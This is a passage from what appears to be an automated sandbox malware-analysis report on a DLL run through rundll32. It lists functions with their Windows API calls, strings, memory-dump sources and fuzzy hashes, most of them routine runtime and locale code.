LoadLibraryExW.KERNEL32(?,00000000,00000002), ref: 615AEC6F
FindResourceW.KERNEL32(00000000,?,?), ref: 615AEC96
LoadResource.KERNEL32(00000000,00000000), ref: 615AECAE

Part of subcall function 615AE270: GetLastError.KERNEL32(615AED79), ref: 615AE270

FreeLibrary.KERNEL32(00000000,00000000,?), ref: 615AED9F

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: LibraryLoad$Resource$ErrorFindFreeLast
String ID:
API String ID: 328770362-0
Opcode ID: 35e2ae1e06dc83f95a6dc270427ff6c52811f7956388494b06113d92a3719a68
Instruction ID: 6866a2dd90df3aded95dc91da07eeb2477df2409fcb010302f9195d4510e3d6b
Opcode Fuzzy Hash: 35e2ae1e06dc83f95a6dc270427ff6c52811f7956388494b06113d92a3719a68
Instruction Fuzzy Hash: 7A51F3B1A80219DFDB21DF59CC50B9DFBF9EF89310F508559F509A7240DB309E408B99

Uniqueness

Uniqueness Score: -1.00%

Function 615D5F10, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,615D622F,?,00000000), ref: 615D5FA9
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,615D622F,?,00000000), ref: 615D5FD2
GetACP.KERNEL32(?,?,615D622F,?,00000000), ref: 615D5FE7

Strings

ACP, xrefs: 615D5F2E
/b]a, xrefs: 615D5FC7, 615D5F9E
OCP, xrefs: 615D5F64

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: InfoLocale
String ID: /b]a$ACP$OCP
API String ID: 2299586839-3557568462
Opcode ID: 29eef0f9aea63987eb67b75b243dd5edae0e69ab9563222af7b0af174424f074
Instruction ID: 7699f7410a644cc08355f1f9322c8b38d8a3766eb678ed5b4efdb2a3a9cdf9c1
Opcode Fuzzy Hash: 29eef0f9aea63987eb67b75b243dd5edae0e69ab9563222af7b0af174424f074
Instruction Fuzzy Hash: C02195A1E65206AAE711CFACC944E8BF7B6EB45B50B56C4A4E929DF100F732DD40C358

Uniqueness

Uniqueness Score: -1.00%

Function 615B849D, Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,615B83B9,00000000,?,615B8550,00000000), ref: 615B849F
GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,0000000C,615B83B9,00000000,?,615B8550,00000000), ref: 615B84C5
HeapAlloc.KERNEL32(00000000), ref: 615B84CC
InitializeSListHead.KERNEL32(00000000), ref: 615B84D9
GetProcessHeap.KERNEL32(00000000,00000000), ref: 615B84EE
HeapFree.KERNEL32(00000000), ref: 615B84F5

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
String ID:
API String ID: 1475849761-0
Opcode ID: 682aa0f925ff038007333275617b23b0a3deacb4c6a01ab6f03ca2dca2efd723
Instruction ID: de3c23bdd6c82529c893ea610d0d48227e721238f12da7ef83c7aec8332d8607
Opcode Fuzzy Hash: 682aa0f925ff038007333275617b23b0a3deacb4c6a01ab6f03ca2dca2efd723
Instruction Fuzzy Hash: 2EF0A4356106029BEB01AFB88C18B0AF7AABB87715F03842DE965D3280DF30C4408755

Uniqueness

Uniqueness Score: -1.00%

Function 615D60E4, Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 615CA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,615BED16,615ED0A0,0000000C,00000004,00000001,00000004,?,615A4865,00000000,00000000), ref: 615CA298
Part of subcall function 615CA294: SetLastError.KERNEL32(00000000,00000006,000000FF,?,615A4865,00000000,00000000), ref: 615CA33C
Part of subcall function 615CA294: _abort.LIBCMT ref: 615CA342

Part of subcall function 615CA294: _free.LIBCMT ref: 615CA2EF

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 615D61F0
IsValidCodePage.KERNEL32(00000000), ref: 615D624B
IsValidLocale.KERNEL32(?,00000001), ref: 615D625A
GetLocaleInfoW.KERNEL32(?,00001001,615CB71F,00000040,?,615CB83F,00000055,00000000,?,?,00000055,00000000), ref: 615D62A2
GetLocaleInfoW.KERNEL32(?,00001002,615CB79F,00000040), ref: 615D62C1

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser_abort_free
String ID:
API String ID: 1247548202-0
Opcode ID: da28370feac7c4e20605a95d2c86df5da194c514bc109d251b2fe4d3f68ce57b
Instruction ID: 16daf9d797b79157bfe47a094c942bd206067644175ac60f86455cc164701dd7
Opcode Fuzzy Hash: da28370feac7c4e20605a95d2c86df5da194c514bc109d251b2fe4d3f68ce57b
Instruction Fuzzy Hash: 4F516E71D0035AAAEF00DFF9CC40AAEF7B8EF85700F058469E925EB150E7709A458B69

Uniqueness

Uniqueness Score: -1.00%

Function 615C3780, Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 469COMMON

Download Yara Rule

Strings

9B]a, xrefs: 615C379D, 615C394A, 615C3B77, 615C3B10, 615C3998, 615C3926
9B]a, xrefs: 615C3BAC, 615C3BC2

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID:
String ID: 9B]a$9B]a
API String ID: 0-1901455017
Opcode ID: 8fb410383caaa7acc65429232e6d05084c5e6130ecc2ca8dd5f12eb1bacced4b
Instruction ID: 133b8ba5da00cc536054769e4cb3bd25679dc75ed2abebb7b073b81bbfbbc06f
Opcode Fuzzy Hash: 8fb410383caaa7acc65429232e6d05084c5e6130ecc2ca8dd5f12eb1bacced4b
Instruction Fuzzy Hash: 01023A71E042199FDB54CFA9C88069EFBF1EF88724F15826ED819E7384D731AA41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 615B81F2, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 615A8BC0: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,615ED6E8), ref: 615A8BC5
Part of subcall function 615A8BC0: GetLastError.KERNEL32(?,00000000,00000000,?,615ED6E8), ref: 615A8BCF

IsDebuggerPresent.KERNEL32(?,?,?,615A11DF), ref: 615B8225
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,615A11DF), ref: 615B8234

Strings

]a, xrefs: 615B8215
ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 615B822F

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ]a$ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-1483685908
Opcode ID: 2d23b843b78591ad9868c79c3cb8b75d6de3ae554d1dbfd2c5ec4fecbaac3f2b
Instruction ID: 3c6ed1c2fff8e8d18867e1577fe42481724e14785908d82114052bdf574816d0
Opcode Fuzzy Hash: 2d23b843b78591ad9868c79c3cb8b75d6de3ae554d1dbfd2c5ec4fecbaac3f2b
Instruction Fuzzy Hash: D3E039B0910B028BD7609FA9D018706FAE0AB45204F05CC1DD4A6C2640EB70D488CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 615D57AC, Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 615CA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,615BED16,615ED0A0,0000000C,00000004,00000001,00000004,?,615A4865,00000000,00000000), ref: 615CA298
Part of subcall function 615CA294: SetLastError.KERNEL32(00000000,00000006,000000FF,?,615A4865,00000000,00000000), ref: 615CA33C
Part of subcall function 615CA294: _abort.LIBCMT ref: 615CA342

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,615CB726,?,?,?,?,615CB318,?,00000004), ref: 615D588E
_wcschr.LIBVCRUNTIME ref: 615D591E
_wcschr.LIBVCRUNTIME ref: 615D592C
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,615CB726,00000000,615CB846), ref: 615D59CF

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort
String ID:
API String ID: 4244957817-0
Opcode ID: e86454130572464b7bc66581243d171dce9c15ae881d96d18046c17d3cedbfe3
Instruction ID: e4640d370ffb0ef266acb318b696e54e7bc54f03878744b5a0406e9d09135ad9
Opcode Fuzzy Hash: e86454130572464b7bc66581243d171dce9c15ae881d96d18046c17d3cedbfe3
Instruction Fuzzy Hash: 03611871E20207AAF7159FBDCC41AAAF7B8EF86710F14C429E914DB180EB70D944C769

Uniqueness

Uniqueness Score: -1.00%

Function 615A5A30, Relevance: 6.1, APIs: 4, Instructions: 134clipboardwindowCOMMON

Download Yara Rule

APIs

GetOpenClipboardWindow.USER32(00000000,?,00000000,615A6431,0000002E,00000000,00000000,?,0000002E,00000000), ref: 615A5A3C
CloseClipboard.USER32 ref: 615A5A73
GetMenuCheckMarkDimensions.USER32 ref: 615A5B30
IsSystemResumeAutomatic.KERNEL32 ref: 615A5BA0

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: Clipboard$AutomaticCheckCloseDimensionsMarkMenuOpenResumeSystemWindow
String ID:
API String ID: 2155751611-0
Opcode ID: 2546129387c6ade740f36d556521c7b20520ac458bdb4f54d6efd9619e805a45
Instruction ID: 84e3164953e9601e3cb64f04bcd803e5af8bbe485c734f9b8617bccfa94a1a94
Opcode Fuzzy Hash: 2546129387c6ade740f36d556521c7b20520ac458bdb4f54d6efd9619e805a45
Instruction Fuzzy Hash: 8F41D771E64B468AC302DE7580A061FFBE6AFDB281F55D72AE441A6111FB708C858B82

Uniqueness

Uniqueness Score: -1.00%

Function 615B5239, Relevance: 6.0, APIs: 4, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,615B5358,615DB3CC,00000017), ref: 615B523E
UnhandledExceptionFilter.KERNEL32(615DB3CC,?,615B5358,615DB3CC,00000017), ref: 615B5247
GetCurrentProcess.KERNEL32(C0000409,?,615B5358,615DB3CC,00000017), ref: 615B5252
TerminateProcess.KERNEL32(00000000,?,615B5358,615DB3CC,00000017), ref: 615B5259

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: cc1584ca3a3842c88ca9734b20f6a7037f27fa71a6ee050fdf7a4e56d23c214a
Instruction ID: f822e9f99dbb13af49df5963e4898b4a983fbc78acdaaa7c3a298166cc9c0c00
Opcode Fuzzy Hash: cc1584ca3a3842c88ca9734b20f6a7037f27fa71a6ee050fdf7a4e56d23c214a
Instruction Fuzzy Hash: 39D01232820208ABCE003BF0C90CA88BF3AEB4BB03F03C000F72A82540CB3144C08B6D

Uniqueness

Uniqueness Score: -1.00%

Function 615ABC70, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 204COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,3F3F20BC,00000000,?), ref: 615ABCDE

Strings

\PerfmonBar\config.xml, xrefs: 615ABD92

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: FolderPath
String ID: \PerfmonBar\config.xml
API String ID: 1514166925-3729978544
Opcode ID: 95533324866484cf773b34518e84a6235e5fe78d150d8c621c33dd1c1f8ee548
Instruction ID: 0b25ea624bb947b0ced7233ad248a0a3d45b3a2dfaee096810846694d398fa4c
Opcode Fuzzy Hash: 95533324866484cf773b34518e84a6235e5fe78d150d8c621c33dd1c1f8ee548
Instruction Fuzzy Hash: 2371C571D106589FDB20DFA8DD84B9EFBB4FB48714F108299D919A7280EB70AE44CF91

Uniqueness

Uniqueness Score: -1.00%

Function 615D5B97, Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 615CA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,615BED16,615ED0A0,0000000C,00000004,00000001,00000004,?,615A4865,00000000,00000000), ref: 615CA298
Part of subcall function 615CA294: SetLastError.KERNEL32(00000000,00000006,000000FF,?,615A4865,00000000,00000000), ref: 615CA33C
Part of subcall function 615CA294: _abort.LIBCMT ref: 615CA342

Part of subcall function 615CA294: _free.LIBCMT ref: 615CA2EF

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 615D5BEB
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 615D5C3C
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 615D5CFC

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: InfoLocale$ErrorLast$_abort_free
String ID:
API String ID: 942303603-0
Opcode ID: 6cfbc66bb2f308c0a4bd923a2010d81f2fc7820e3ea823dd88d6b36bfbabbc97
Instruction ID: b7be74054ea38297bd6528e7602c6e35702e72e0c2275a782be5bde676bd29f3
Opcode Fuzzy Hash: 6cfbc66bb2f308c0a4bd923a2010d81f2fc7820e3ea823dd88d6b36bfbabbc97
Instruction Fuzzy Hash: C261B171D242079BEB199F6CCC85BAAF7B8EF45304F10C1A9E915C6680F774DA82CB54

Uniqueness

Uniqueness Score: -1.00%

Function 615BED41, Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,000000FF), ref: 615BEE39
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,000000FF), ref: 615BEE43
UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,000000FF), ref: 615BEE50

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 09b70091f5aabac60e0acec5ddc5d29dab180f605b29152814dc49ecfb16d69a
Instruction ID: 008e54be4add8338897fd4f61cdf07de523eb79c8c209d11f3ada2b27bce724b
Opcode Fuzzy Hash: 09b70091f5aabac60e0acec5ddc5d29dab180f605b29152814dc49ecfb16d69a
Instruction Fuzzy Hash: 7031D374D112199BCB21DF65D888B8CBBB8FF49310F5085DAE41CA7290E7709F858F44

Uniqueness

Uniqueness Score: -1.00%

Function 615C69AA, Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(615C69A9,?,615C69A9,00000000), ref: 615C69CC
TerminateProcess.KERNEL32(00000000,?,615C69A9,00000000), ref: 615C69D3
ExitProcess.KERNEL32 ref: 615C69E5

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 19f69c6f0362060cd9cc5110cdd7b5e42ea35b2a449da0e020111a1e6af7c19c
Instruction ID: bfacd5f8aced473a2a7b468d424b9ca1e9cb3271b81c5c9a1a31b0aeaef38e07
Opcode Fuzzy Hash: 19f69c6f0362060cd9cc5110cdd7b5e42ea35b2a449da0e020111a1e6af7c19c
Instruction Fuzzy Hash: CAE0BF31410659ABCF017FE5C908AACBB69FB86A51F02C429F51586620CB39DD81DB85

Uniqueness

Uniqueness Score: -1.00%

Function 615CD1EE, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 615CD39F

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 70e0993a0e70416583b7beb69350d40f54a642f7a7df04c7398a685a2ce71e71
Instruction ID: b6497771fc3e39468b39759e688a1aa3676263d0e78253b3ca1323a86e0f92c2
Opcode Fuzzy Hash: 70e0993a0e70416583b7beb69350d40f54a642f7a7df04c7398a685a2ce71e71
Instruction Fuzzy Hash: D83104729442496BDB148EF9CC84EEFFBBEDBC6B14F00829CE429D7240E6309D458B91

Uniqueness

Uniqueness Score: -1.00%

Function 615CE2F8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,?,?,?,615CB7B9,?,20001004,?,00000002,?), ref: 615CE337

Strings

;\[a, xrefs: 615CE322

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: InfoLocale
String ID: ;\[a
API String ID: 2299586839-3318329
Opcode ID: 936f3a3025fc2804f7bd86891fc29c630c94b6fd69a317320ad11db052356a14
Instruction ID: 259d966325e56166b9aa9fae3599dc4aab54ce07a26e59c8dd55eb14206b66d0
Opcode Fuzzy Hash: 936f3a3025fc2804f7bd86891fc29c630c94b6fd69a317320ad11db052356a14
Instruction Fuzzy Hash: 51F08931901118BBCF01AFA5CC05D6EFFA6EF8AB10F028519FC1556210DF319E519B95

Uniqueness

Uniqueness Score: -1.00%

Function 615B5916, Relevance: 1.6, APIs: 1, Instructions: 129COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 615B592F

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 6b709394bad9278b83246f773cae78dddcab4faa31190d28ac1b43c08f01018e
Instruction ID: 9673979de2bc0de761497731b85f7817f1cf70e2e85f2360959901db0588b90d
Opcode Fuzzy Hash: 6b709394bad9278b83246f773cae78dddcab4faa31190d28ac1b43c08f01018e
Instruction Fuzzy Hash: 4D4158B19212068FEB48CF96D5917AEFBF4FB89314F16C46AD421EB240E3749940CF60

Uniqueness

Uniqueness Score: -1.00%

Function 615D5DE7, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 615CA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,615BED16,615ED0A0,0000000C,00000004,00000001,00000004,?,615A4865,00000000,00000000), ref: 615CA298
Part of subcall function 615CA294: SetLastError.KERNEL32(00000000,00000006,000000FF,?,615A4865,00000000,00000000), ref: 615CA33C
Part of subcall function 615CA294: _abort.LIBCMT ref: 615CA342

Part of subcall function 615CA294: _free.LIBCMT ref: 615CA2EF

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 615D5E3B

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 92d756d3262cd0dded4e80741a62d5dfb44a3ea983828741692824fbf26dff39
Instruction ID: 60d090a902ccc8ab8580baf7b8530723d374a569fa02a09ba964140a21b48378
Opcode Fuzzy Hash: 92d756d3262cd0dded4e80741a62d5dfb44a3ea983828741692824fbf26dff39
Instruction Fuzzy Hash: 4D21D3729652069FDB15EEA9CC41B6AF7B8EF81314F00C0AAED05D6140EB759D44CB54

Uniqueness

Uniqueness Score: -1.00%

Function 615D5A6F, Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 615CA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,615BED16,615ED0A0,0000000C,00000004,00000001,00000004,?,615A4865,00000000,00000000), ref: 615CA298
Part of subcall function 615CA294: SetLastError.KERNEL32(00000000,00000006,000000FF,?,615A4865,00000000,00000000), ref: 615CA33C
Part of subcall function 615CA294: _abort.LIBCMT ref: 615CA342

EnumSystemLocalesW.KERNEL32(615D5B97,00000001,00000000,?,615CB71F,?,615D61C4,00000000,?,?,?), ref: 615D5AE1

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort
String ID:
API String ID: 2626063627-0
Opcode ID: c084add4d2525a3c45a178ffa48b0f5071828d34c22415b418b4265c771d9beb
Instruction ID: ec5cdbc4cd115528ab45910c3f5e362f51dbf896474d05444d68b16df1a5cd28
Opcode Fuzzy Hash: c084add4d2525a3c45a178ffa48b0f5071828d34c22415b418b4265c771d9beb
Instruction Fuzzy Hash: 251129366147015FEB089F7DC8D067AFBB2FF80719B15842DD58747A40E7716942CB44

Uniqueness

Uniqueness Score: -1.00%

Function 615D6017, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 615CA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,615BED16,615ED0A0,0000000C,00000004,00000001,00000004,?,615A4865,00000000,00000000), ref: 615CA298
